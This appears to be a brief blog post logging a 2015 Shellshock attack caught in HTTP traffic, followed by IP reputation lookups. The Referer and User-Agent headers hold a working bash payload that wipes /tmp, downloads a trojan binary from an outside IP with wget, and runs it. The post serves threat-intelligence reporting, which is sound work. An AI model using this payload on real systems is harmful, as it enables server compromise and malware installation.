BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not thought to see that again :-)
java: Linux.Trojan.Agent FOUND
61.161.130[.]241
Static Source: GeoIP data
- Country: China
- ASN: AS4837 CNCGROUP China169 Backbone
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/61.161.130.241
61.160.212[.]172
Static Source: GeoIP data
- Country: China
- ASN: AS23650 AS Number for CHINANET jiangsu province backbone
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/61.160.212.172
Keine Kommentare:
Kommentar veröffentlichen